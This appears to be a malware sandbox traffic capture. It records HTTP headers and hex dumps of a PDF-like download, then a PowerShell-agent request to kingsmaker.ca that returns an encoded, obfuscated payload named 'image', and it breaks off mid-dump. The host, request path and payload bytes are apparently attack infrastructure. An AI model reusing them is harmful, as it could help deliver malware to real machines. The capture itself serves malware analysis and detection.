2024-11-29 08:09:07 UTC	1107	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:07 GMT Content-Type: application/octet-stream Content-Length: 697614 Connection: close content-disposition: attachment; filename=file; filename*=UTF-8''file CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngXHMbtPXSMJyHT%2BadM9ubyXAuvO%2BUndmwQTchC%2BJpVZYovYZTKTsO0RUgyRAW8ax1QcUlU%2Bp98ZKaV4Hvtm6olf%2BQR96C%2FQUzWwgL0bO7yYdPqAvyRhOirAlDbFPMc6ABAz3lNsPv24"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17322&min_rtt=1180&rtt_var=28721&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1521&recv_bytes=2741&delivery_rate=22984&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d1b7fd409ff-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158787&min_rtt=158670&rtt_var=33653&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24082&cwnd=252&unsent_bytes=0&cid=3e782ad2ff29e765&ts=714&x=0"
2024-11-29 08:09:07 UTC	262	IN	Data Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 57 69 64 74 68 20 31 32 34 31 0a 2f 48 65 69 67 68 74 20 31 37 35 34 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 46 69 6c 74 65 72 20 5b 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 44 43 54 44 65 63 6f 64 65 5d 0a 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 5b 6e 75 6c 6c 20 3c 3c 0a 2f 51 75 61 6c 69 74 79 20 36 30 0a 3e 3e 5d 0a 2f 4c 65 6e 67 74 68 20 31 36 37 35 32 32 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c ec bd 05 58 1c db b6 2e 5a 04 4b 20 40 d0 10 34 01 82 4b b0 40 b0 86 10 3c b8 34 4e 82 bb bb 35 81 00 a1 71 08 10 20 48 70 27 10 dc 83 Data Ascii: %PDF-1.4%12 0 obj<</Subtype /Image/Width 1241/Height 1754/ColorSpace /DeviceRGB/BitsPerComponent 8/Filter [/FlateDecode /DCTDecode]/DecodeParms [null <</Quality 60>>]/Length 167522>>streamxX.ZK @4K@<4N5q Hp'
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: af c9 5e 67 ef b5 d6 dd 67 9f fb de bd 7b 9f 73 cf 7d fd 7d 13 aa ab aa ab 6b ca f8 c7 ff 8f 39 66 35 7c 02 3e 0d 88 02 58 f7 30 30 31 ee 62 61 62 60 62 63 63 e1 e0 3f 26 c4 c7 c3 c3 a7 23 a3 78 f8 98 95 81 fd 19 2b 03 0b 33 27 9f b4 10 e7 73 71 1e 66 16 61 b0 88 f8 6b 39 25 65 25 0e 21 cd b7 9a 0a 6f a4 15 95 e4 6f 2f 82 84 8d 8d 8d 8f 8b 4f 4b 48 48 2b cf cd c2 2d ff ff fa 05 6f 02 70 ef a2 4d a1 4c 22 23 51 01 77 70 91 90 71 91 e0 ad 00 25 00 20 a1 22 fd 7a 01 bf bd 90 ee 20 a3 a0 a2 a1 df 45 dc 34 e2 84 f2 07 c0 1d 24 64 e4 3b 28 c8 a8 a8 28 28 88 a3 5e 88 e3 00 0a 2e 2a de 13 76 11 34 7c c5 b7 e8 54 76 04 1c ef 22 bf dc a5 7e 59 f2 9d 50 69 70 9f 86 53 df de f7 1e 06 d1 43 e2 47 24 4f 69 e9 e8 19 18 b9 b8 9f f3 f0 be e0 13 7d 25 26 2e 21 29 25 ad ac Data Ascii: ^gg{s}}k9f5\|>X001bab`bcc?&#x+3'sqfak9%e%!oo/OKHH+-opML"#Qwpq% "z E4$d;(((^.*v4\|Tv"~YPipSCG$Oi}%&.!)%
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: 44 34 5e 21 55 cb 97 43 fa 59 6f 38 af 73 6a b0 35 74 c7 58 06 c5 08 7e fc 67 d3 d6 ff 46 34 f6 1f d2 55 a5 d1 13 fa b2 42 c1 3d 3a b0 93 36 56 fe 48 f4 50 35 3f 1b be 45 4d e8 c8 38 d1 f3 12 29 14 e0 61 05 a5 ab 5f b2 c8 a6 3c e5 8d 79 90 8a a2 33 b7 ff 23 d9 17 2c 21 94 38 90 ce 51 33 38 a0 d3 7f 52 2c 72 80 16 63 04 79 cb 15 f7 8c 21 96 7e 32 4a a4 e5 0e 9a fb a5 07 38 f9 dc 72 f7 40 2c 11 37 a4 f7 b3 bb 53 d1 51 2b c9 4e 68 52 dd 98 7f cf b8 d2 17 b1 00 b6 f8 77 d4 64 97 6a 04 85 9d bb ce fa 2a f5 05 6e 2e 94 0b f7 0c 13 5b 9e db 30 7d ab c6 e6 61 ff b1 30 81 33 54 61 d1 b7 e3 64 65 d1 f2 7c cc 4e e7 3b e5 64 bc 96 e5 fd 67 13 b3 51 52 db de 36 b0 72 17 12 b9 4c a2 fc ec cc 65 8c cd e2 c8 f2 1a 5f be b1 b2 d5 84 95 4d 07 70 26 7d a5 50 68 1c 13 53 1b Data Ascii: D4^!UCYo8sj5tX~gF4UB=:6VHP5?EM8)a_<y3#,!8Q38R,rcy!~2J8r@,7SQ+NhRwdj*n.[0}a03Tade\|N;dgQR6rLe_Mp&}PhS
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: 2f 4f db 60 b0 c2 7f c6 bf 5c a5 e4 2a e4 97 a9 3c 78 fd 62 91 85 be 6b 2c 4e 4d f1 91 30 56 2d b3 2b 1c f0 b9 1a c3 de 4d 8b d2 24 1f 58 51 21 23 05 9b 08 fe 6e ec 9e 34 4f bb b2 a9 56 d4 c8 e4 d8 ec 44 19 5a 75 7d 97 fa 7e 2d 66 81 89 43 84 73 11 32 55 59 f2 1e e7 26 16 aa 3d a0 66 aa 1e 87 51 2a c7 a1 37 de d9 f9 f7 07 f2 16 93 fa fe da 87 72 65 7c 9d 99 49 69 7d 14 d6 21 95 23 38 80 74 9a 9f c0 68 51 43 0e 9d 7a 1e 55 c9 ce 84 df c0 30 42 21 ff 65 eb 95 75 de 0b ee d4 b5 ae 75 7a da a2 b0 bc d2 3a 45 84 ad ce 9e dd d8 73 5d 79 19 df 23 7e da f3 90 c8 da 1d f3 43 97 df b1 75 4a 21 e7 5f 5d ff 8f ec 87 06 b1 b8 76 09 8d 0e a1 fb 2c 47 1a 9b 70 c0 38 9a 8a a9 ad a9 5f b6 85 17 96 7e 90 7d 7e 7a 3d 6b 9e 6f 42 f1 da 39 28 b6 e3 2c f1 11 cc 37 2f 33 1f 0e Data Ascii: /O`\<xbk,NM0V-+M$XQ!#n4OVDZu}~-fCs2UY&=fQ7re\|Ii}!#8thQCzU0B!euuz:Es]y#~CuJ!_]v,Gp8_~}~z=koB9(,7/3
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: 70 e0 18 af 02 51 4d df e2 1f b0 c2 86 80 3a e9 ac 42 09 4c f5 61 ac 40 d5 62 97 92 1d 3b f9 fb 5f ef 2d c5 90 50 f1 a0 a3 87 b8 af e6 c1 81 df b7 8b bc a8 1a e4 ae 56 5a c8 37 ad 07 e8 b9 ab 75 70 00 86 5b 6f 01 7b 37 ec fd 32 68 24 4a 2a 83 20 e7 a5 9c b4 52 79 f8 6b d8 e4 50 e3 3a 9d 11 1c 80 8c 5f 9b fe fe 8d 45 17 9b e3 56 af 40 6a 7d a5 ab cb 9a f5 ee f9 d6 f5 46 6c 6c dc c3 6f 1f ac f4 cd 0c a9 f9 c1 45 4c a0 02 e9 d3 92 c1 13 7a cd eb 29 cf 70 cd df 7f d6 7c 86 53 cc 0e af db 86 51 86 d4 d1 f1 4d 13 8c aa 2e fd af 5f 5f 8f df 5c 31 ac e9 ea 3c 86 f9 69 ea 85 b2 f7 8a 75 3a 6b c7 e5 d8 c7 4d 69 b9 5e f5 b5 e2 97 04 4b ae 5d 70 c0 ce a8 dc 8b 45 3d df 5c ed 8d 9f ef fd ad 8e 2d a9 9b 6f 99 90 01 b9 6e 18 1c 28 3e 1f 8f 9a 87 74 dc 74 dc 38 d9 ac 9a Data Ascii: pQM:BLa@b;_-PVZ7up[o{72h$J* RykP:_EV@j}FlloELz)p\|SQM.__\1<iu:kMi^K]pE=\-on(>tt8
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: a5 08 d9 67 10 29 3b 11 34 86 d2 17 a5 f7 fe 5f 48 fe fe 01 e9 43 03 ff 8e 46 d4 5b fc 5b ac 56 57 46 db 35 3c 88 22 0b f9 a7 77 66 f8 71 d2 73 38 70 9e 56 85 80 3d 2a a6 d1 63 41 25 41 bd d7 61 9b 02 68 20 e6 e0 9b 31 72 31 87 64 9e 41 cf 2d 95 51 96 e8 b3 48 7a 7c 80 af d8 f8 1a 14 37 84 18 b7 18 16 12 92 23 1d 09 1d db df 16 8c 28 92 43 cf 21 cc c3 c1 8e d9 26 5f 55 64 f0 65 92 f9 d3 f3 fe 3e ab 28 ea 5e c4 45 17 f6 f1 8b b0 06 a3 40 6a 46 db cf 6d 60 e2 4c 38 97 db 65 08 ff 49 e8 19 18 00 07 5c 20 9c a3 36 8d 4b cd 4b b0 6a 9e 43 ee c5 93 9d 87 f3 07 0b 76 08 8f 9e 78 41 72 e0 5e 20 b7 1e 82 36 24 08 11 46 e0 11 5a 0a 1c d0 dd 40 58 20 74 a0 98 be f2 40 bc dc ca 86 ec c1 dc 4e 18 37 46 fe ca 93 26 72 3e 68 34 0c 6f c7 03 06 81 03 87 f7 21 d7 b2 4a ad Data Ascii: g);4_HCF[[VWF5<"wfqs8pV=*cA%Aah 1r1dA-QHz\|7#(C!&_Ude>(^E@jFm`L8eI\ 6KKjCvxAr^ 6$FZ@X t@N7F&r>h4o!J
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: bf 6f fa 3d 4f 54 04 e4 ee dd 54 d8 6c 68 8f 40 3e c0 4c be 40 61 77 2e c8 9f da cf 3d db 3f 7e a8 a6 34 3f d5 8e b7 f9 a4 fe 34 c4 0d ca b7 36 3f 57 93 20 ae d0 a5 1a 20 42 4c 55 93 49 f8 d4 d8 ad 6c 93 cf 5e 49 22 44 63 56 c6 c8 8d 70 04 2b 88 ea 4d cb 35 d3 c4 8e 89 4c be 7a 11 f5 55 54 aa d3 25 6e c2 41 10 d8 b0 c8 67 cd 02 57 37 7b 01 dd 4c 80 dd 50 2b 47 8d d2 47 1f fd b0 c8 92 7f 34 7d a0 a3 8d 37 97 c2 e6 df 73 e4 be e3 a0 65 fe 1c c8 78 4f ca 25 6e d1 59 93 de 21 2b 1c 98 36 86 7d cc 41 74 ed 75 57 1b 04 c9 33 2c aa 9a ed 03 0f 4c 2d 09 0b 4a 99 e0 3c 33 bf 5b 8c e0 48 94 31 4e e5 2b ba 2c 8d 57 90 0f ac 8f e4 0c de 5f 48 1d 93 43 b4 c7 46 57 4c 2f 3f 7f e2 f3 1c 65 9b 30 09 70 2c c9 df ec b6 a1 f5 cc 14 77 a1 fe da 8e be 29 66 2c 8f 39 3d 23 85 Data Ascii: o=OTTlh@>L@aw.=?~4?46?W BLUIl^I"DcVp+M5LzUT%nAgW7{LP+GG4}7sexO%nY!+6}AtuW3,L-J<3[H1N+,W_HCFWL/?e0p,w)f,9=#
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: b9 01 6c 01 66 fc ad e5 fa f5 34 e5 3e 9b 72 d4 41 5f d0 a9 4c e3 0e a9 63 2b 7e ca 1c d2 35 db 16 a2 93 f8 7a 87 4e a2 d1 42 21 99 7d 52 50 d3 1f 1f e0 80 53 bd 50 e0 c5 8d c5 70 b1 d5 93 86 6f b1 63 0b 2e 12 8c 3b d4 97 37 16 9d 27 3a 42 56 6c 0a b1 43 90 ba c0 80 ed 96 92 6c 35 56 bc 55 1d b1 80 9c bc 96 28 ad b4 a4 df 82 10 ad f9 d3 08 fe ab d6 28 22 8f 35 12 02 99 bc 08 4b 83 32 e5 1c 85 53 fc de df 4c 7f 3f 2d 99 3b 7f 69 a1 e1 bd 5c b4 e9 55 8a ce dd ba 95 72 48 3e 02 da 5a 95 bf b9 3b ee f1 93 ed e2 21 64 e7 1b 44 7a 29 f3 5a e2 48 50 5b b9 1c 65 3c 72 6d be 71 e8 04 b4 db 6f c1 b6 99 55 0b 22 de b2 eb 5e b8 52 df 49 4c fc 49 16 72 2c 32 e2 ed e9 8d f6 ad 0e 92 ed 46 f2 d1 a5 b3 f1 69 d7 42 c9 cd 01 8c 9a 32 b2 48 35 69 52 55 23 e8 ee b3 d4 64 3f Data Ascii: lf4>rA_Lc+~5zNB!}RPSPpoc.;7':BVlCl5VU(("5K2SL?-;i\UrH>Z;!dDz)ZHP[e<rmqoU"^RILIr,2FiB2H5iRU#d?
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: a5 45 99 06 44 99 d9 bd 66 3c b3 91 76 29 bb c9 1d fb dc 6b 12 df 6b 7e ea a3 d6 3c c0 51 64 3c ba 1c cf 1e 7c b5 21 ee e1 cf fc 6a 83 e9 55 ef fe e5 26 ee 86 62 4b 9e 44 85 6b 83 f0 b4 9f b5 e2 c0 c1 7c e5 82 a6 8a a2 5a 4c 4c 88 e1 45 a2 31 6d e5 42 30 b9 76 bc dc 9b 6a 38 90 9c c3 77 23 e1 be 6c 5d 87 9b ff b2 a3 f3 d0 fa 61 09 78 0a 42 ad 1b 2d f6 2a 57 5c 33 71 b8 75 24 ab 20 39 30 ae 03 d1 8a d3 58 e6 91 e1 6a 31 90 2f dc f5 99 ae 44 f4 49 46 a3 74 f8 b8 fd 31 14 2f 61 74 b9 37 4c a5 69 59 5c 8f a1 c9 1c 05 31 15 a4 64 66 04 16 64 92 39 d0 db 48 05 86 13 81 5a 07 c3 2a 64 df df 42 6f 26 10 06 c3 d8 73 64 92 b2 74 d4 d2 d2 f2 41 29 29 22 45 a7 ce cd 3f 56 b3 cd 24 e6 4f 77 af 0a 1a 55 8b 50 43 0f e6 42 2e 98 ca 88 5d 10 9b 91 58 a1 f9 c9 71 86 02 6b Data Ascii: EDf<v)kk~<Qd<\|!jU&bKDk\|ZLLE1mB0vj8w#l]axB-W\3qu$ 90Xj1/DIFt1/at7LiY\1dfd9HZdBo&sdtA))"E?V$OwUPCB.]Xqk
2024-11-29 08:09:07 UTC	1369	IN	Data Raw: 70 76 95 a0 b3 e5 71 2d 94 c1 99 e9 0e 01 66 92 17 2a 7c cf 76 ef 76 72 21 3d fd 45 dc 54 78 e2 14 26 26 7b 5d ec af 9e f8 63 d6 ba 03 9c c2 f8 8a da 2e bf bb 12 1c f0 8f 5b 28 be d8 72 80 03 de b2 80 33 97 9a da bb 45 72 50 eb b3 ee e7 09 43 1c 2f bf 6b b9 5b 2d 87 8c 15 02 04 e0 7b 70 00 13 2c 02 07 52 64 65 60 37 1d 70 a0 6d f0 cf 3b 06 d0 5d c4 6c 53 f6 cb 1d 29 2f 8e 47 1a f7 66 20 d7 3a 2f bc 19 4d 51 7e 4e 9b 33 ed ea cb c3 58 7d f8 13 98 e2 4a ce df 2d e4 b7 df 3b 5d 42 a6 f0 75 ed 0a ef cf de d2 61 46 68 6f 19 66 3c 9a 92 af 5d 35 cf de 78 bf 57 40 5e ff b7 11 5c a0 03 69 e3 03 07 66 04 08 8a 4b 21 f7 60 32 a6 59 f3 92 f7 1a 42 9a bb f7 c7 af 4f 10 ae be 91 d6 87 9f 84 29 ec 0f b5 70 1a e8 8a 6e 21 1b 7c 66 ba ac d0 d5 52 45 fd 78 e0 b7 cb 55 cb Data Ascii: pvq-f*\|vvr!=ETx&&{]c.[(r3ErPC/k[-{p,Rde`7pm;]lS)/Gf :/MQ~N3X}J-;]BuaFhof<]5xW@^\ifK!`2YBO)pn!\|fRExU

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:11 UTC	388	OUT	GET /file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Connection: Keep-Alive
2024-11-29 08:09:11 UTC	1112	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:11 GMT Content-Type: application/octet-stream Content-Length: 12110 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jul7%2FxQYzaos%2B81twFNMe%2BZUZlPaupWK%2FRrU0r2IbzblaQmacwPjQp9c7LNQX0pu8tAU8AYhq1ne49ovy0ehGdBTMA9bgjsgrr6oYj7m2E5TScup9vn97p61n4Z%2BQY8J0rRDmffCQBEi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2351&min_rtt=1180&rtt_var=116&sent=498&recv=242&lost=0&retrans=0&sent_bytes=700006&recv_bytes=3741&delivery_rate=39681349&cwnd=275&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d35ca1a0adb-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158900&min_rtt=158777&rtt_var=33593&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24117&cwnd=252&unsent_bytes=0&cid=346d9e73a78f4a6d&ts=711&x=0"
2024-11-29 08:09:11 UTC	257	IN	Data Raw: 25 78 6d 6b 78 62 6e 6f 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 6c 79 68 63 57 4b 72 58 33 6d 4b 5b 33 5b 53 4c 44 75 44 54 56 38 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 65 46 65 56 57 55 50 6f 5b 6a 53 33 69 72 58 33 6d 42 60 46 4b 74 54 6f 43 6a 63 56 79 34 5b 47 69 4f 5b 33 4c 78 4e 56 30 6a 52 46 53 6e 58 33 30 57 5b 33 47 58 55 56 65 69 57 7b 57 37 5b 44 65 46 62 33 4b 49 57 6c 75 44 54 56 38 73 58 6b 4f 52 63 30 71 58 52 6a 4b 68 63 6d 4b 76 5b 46 30 72 64 56 53 58 55 56 65 50 54 31 4b 48 56 6d 69 53 65 47 58 78 4c 59 43 54 4c 6a 71 79 56 6d Data Ascii: %xmkxbno<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VlyhcWKrX3mK[3[SLDuDTV8pRTWNc0qYUoKKS3yuRTeFeVWUPo[jS3irX3mB`FKtToCjcVy4[GiO[3LxNV0jRFSnX30W[3GXUVeiW{W7[DeFb3KIWluDTV8sXkORc0qXRjKhcmKv[F0rdVSXUVePT1KHVmiSeGXxLYCTLjqyVm
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 4c 44 6d 45 4c 54 38 5b 57 7b 47 72 58 7b 4f 42 60 47 6a 78 57 56 65 4b 63 44 71 33 58 6b 4f 52 58 30 54 78 57 6c 71 6a 56 44 71 76 5b 44 69 72 53 47 71 59 4f 55 43 60 56 44 6d 34 52 56 6d 43 65 47 44 78 64 46 69 6b 4c 31 30 6f 52 56 75 46 65 56 53 49 63 45 4b 69 56 44 6e 79 58 7b 47 42 64 56 48 78 54 6b 47 5b 4c 30 47 71 52 54 69 32 5b 30 58 78 60 46 79 6b 63 57 57 31 57 45 4b 4a 62 57 71 59 55 6b 43 4b 52 49 4f 6f 52 6a 58 35 65 57 71 49 63 49 71 6b 53 32 69 6e 5b 57 54 30 60 46 4b 59 57 56 65 4c 57 7b 57 72 52 54 4f 4a 56 46 47 59 4f 56 75 68 4c 33 53 37 52 54 57 52 63 47 71 75 57 6f 57 60 53 30 5b 34 52 56 6d 42 4e 54 53 53 63 33 75 69 56 44 34 55 5b 47 62 30 65 56 47 59 4f 56 34 4b 53 45 43 6f 52 6a 65 60 60 46 4b 48 55 6c 79 51 65 7b 43 4d 58 57 65 Data Ascii: LDmELT8[W{GrX{OB`GjxWVeKcDq3XkORX0TxWlqjVDqv[DirSGqYOUC`VDm4RVmCeGDxdFikL10oRVuFeVSIcEKiVDnyX{GBdVHxTkG[L0GqRTi2[0Xx`FykcWW1WEKJbWqYUkCKRIOoRjX5eWqIcIqkS2in[WT0`FKYWVeLW{WrRTOJVFGYOVuhL3S7RTWRcGquWoW`S0[4RVmBNTSSc3uiVD4U[Gb0eVGYOV4KSECoRje``FKHUlyQe{CMXWe
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 6c 76 76 56 6d 69 4f 63 31 71 47 63 49 57 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6a 4b 6b 52 44 4b 7b 5b 57 4f 42 56 57 50 79 52 56 65 60 57 7b 57 70 58 33 34 72 65 33 53 49 63 49 5b 68 60 55 6d 73 56 6d 65 4e 64 56 57 58 50 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 60 65 6c 4f 71 50 56 38 4a 53 33 75 6f 54 47 4f 43 65 31 38 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 56 6f 43 68 53 30 5b 45 5b 57 69 52 63 46 4f 34 4f 54 30 60 57 7b 57 74 5b 44 65 6f 4f 31 6d 45 54 6f 43 4d 64 59 4f 76 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 30 4b 75 58 57 65 35 63 47 47 74 63 45 43 60 Data Ascii: lvvVmiOc1qGcIWkRGXvTl0rb0qVPlijS3evSGGwUjOqPVeKP1GoRTOC[1m4PjKkRDK{[WOBVWPyRVe`W{WpX34re3SIcI[h`UmsVmeNdVWXPkCiW{m0SGGw[1mEPVeKP1GoRTe`elOqPV8JS3uoTGOCe184PVuiT1G1XjiS[1qIVoChS0[E[WiRcFO4OT0`W{Wt[DeoO1mEToCMdYOvRTi{UjOqPVeKP1GoRTOC[1mEPVeKP0KuXWe5cGGtcEC`
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 53 45 50 55 6d 4b 53 44 47 4e 50 33 6d 43 5b 31 6d 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 56 65 50 54 31 47 73 56 6c 30 46 62 33 4c 78 57 54 34 45 60 54 47 6f 52 54 4f 43 60 33 53 49 57 6f 53 6b 53 57 71 76 58 6a 65 57 5b 30 43 55 50 56 6d 53 64 6f 43 6b 57 6b 4b 72 65 57 71 49 4e 55 4f 6b 4c 59 69 57 56 6d 62 79 65 30 69 49 56 6f 43 68 53 30 57 71 55 32 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 5b 45 4b 6e 62 46 4b 49 57 56 65 4d 50 30 4b 34 56 6d 69 52 64 56 57 57 55 6f 5b 6a 57 7b 54 76 52 54 4c 79 62 33 53 45 50 56 75 68 57 31 58 31 57 56 30 56 4c 46 4f 75 63 46 79 6b 64 54 47 31 56 57 62 30 60 31 6d 45 4c 59 57 68 4c 30 47 6f 52 6a 65 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 57 55 4f 56 60 Data Ascii: SEPUmKSDGNP3mC[1mEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTVePT1GsVl0Fb3LxWT4E`TGoRTOC`3SIWoSkSWqvXjeW[0CUPVmSdoCkWkKreWqINUOkLYiWVmbye0iIVoChS0WqU2bvR1SSc3eKP1Go[EKnbFKIWVeMP0K4VmiRdVWWUo[jW{TvRTLyb3SEPVuhW1X1WV0VLFOucFykdTG1VWb0`1mELYWhL0GoRjeRelPxOYOhLj[sWUOV`
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 70 56 55 4b 56 64 6c 4c 78 56 6b 47 68 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 47 59 56 56 65 4d 53 6d 4b 72 58 7b 4f 53 65 47 57 49 53 6b 43 69 50 31 47 31 57 54 65 46 4c 46 47 45 50 56 75 6a 53 30 5b 31 58 31 57 60 62 46 4b 49 57 56 65 4c 57 6a 4b 6e 5b 44 65 6e 57 56 57 58 50 6c 79 4b 53 59 69 72 56 57 65 5b 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 5b 57 60 30 4b 4a 54 6a 5b 52 54 47 57 47 56 6a 71 4b 50 31 71 47 58 6b 4f 6a 65 56 4b 49 4e 56 69 60 50 31 4b 70 58 6b 48 79 65 33 4b 49 57 6b 43 60 57 30 44 33 52 54 4f 52 4c 47 71 59 4c 59 65 52 63 56 79 7b 56 6d 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 Data Ascii: pVUKVdlLxVkGhPUCMRTOC[1mEPVeKP1GoRTOC[3GYVVeMSmKrX{OSeGWISkCiP1G1WTeFLFGEPVujS0[1X1W`bFKIWVeLWjKn[DenWVWXPlyKSYirVWe[bDmHb14E`TGoRTOC[1mEPVeKP1GoRTOC[1mEPm[W`0KJTj[RTGWGVjqKP1qGXkOjeVKINVi`P1KpXkHye3KIWkC`W0D3RTORLGqYLYeRcVy{VmOKO1SSc3eKP1GoRTOC[1mEPVeKP1
2024-11-29 08:09:11 UTC	625	IN	Data Raw: 57 6c 75 4c 50 31 4b 76 58 6c 30 4e 64 57 71 59 4c 56 79 68 63 6d 47 6f 5b 44 65 6e 63 44 6d 48 52 6c 79 6a 52 44 6e 30 52 54 65 4e 65 6c 53 59 4f 55 43 4b 53 31 5b 30 56 6a 4f 42 4c 30 6d 59 63 45 43 4b 53 31 71 72 56 6c 31 34 64 57 71 55 50 6f 6d 60 56 47 4b 34 5b 57 65 72 65 57 71 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6f 43 60 60 54 47 77 55 47 62 30 65 6c 53 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6f 6d 60 56 47 4b 34 5b 57 57 4e 65 6c 53 59 4f 55 43 4d 64 59 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 63 46 30 4b 50 33 65 73 58 33 30 56 4c 46 4f Data Ascii: WluLP1KvXl0NdWqYLVyhcmGo[DencDmHRlyjRDn0RTeNelSYOUCKS1[0VjOBL0mYcECKS1qrVl14dWqUPom`VGK4[WereWq2LDuKP1GoRTOC[1mEPoC``TGwUGb0elSEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTYCKRIONP3mC[1mEPVeKP1GoRTOC[1mETom`VGK4[WWNelSYOUCMdYONP3mC[1mEPVeKP1GoRTOC[1mIcF0KP3esX30VLFO
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 6f 43 60 60 54 47 77 55 47 62 30 65 6c 53 45 50 56 75 60 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 6d 53 6a 57 31 34 70 56 6d 65 56 60 30 71 59 54 59 43 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 6d 5b 4a 53 57 4f 57 54 6d 57 54 4c 54 4b 49 54 30 4f 43 60 57 4b 49 4e 55 4f 68 63 59 69 33 56 57 65 53 5b 30 71 75 53 6f 43 68 53 30 5b 73 52 54 65 46 63 56 53 49 57 6f 6d 4b 50 30 4b 31 56 57 69 6e 54 30 71 58 54 6f 6d 69 57 30 5b 37 52 54 69 4a 63 46 53 48 52 6f 43 60 56 44 30 30 52 56 62 76 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 35 76 55 6a 4f 72 57 6d 4f 52 53 56 79 47 57 6a 54 34 54 57 4b 73 60 33 65 4b 63 44 34 7b 56 6d 65 56 65 31 6d 44 53 59 65 6b 64 54 6a 32 53 47 47 76 57 46 53 49 53 6f 6d 6a 50 7b 47 54 58 6a 65 56 63 46 4f 45 Data Ascii: 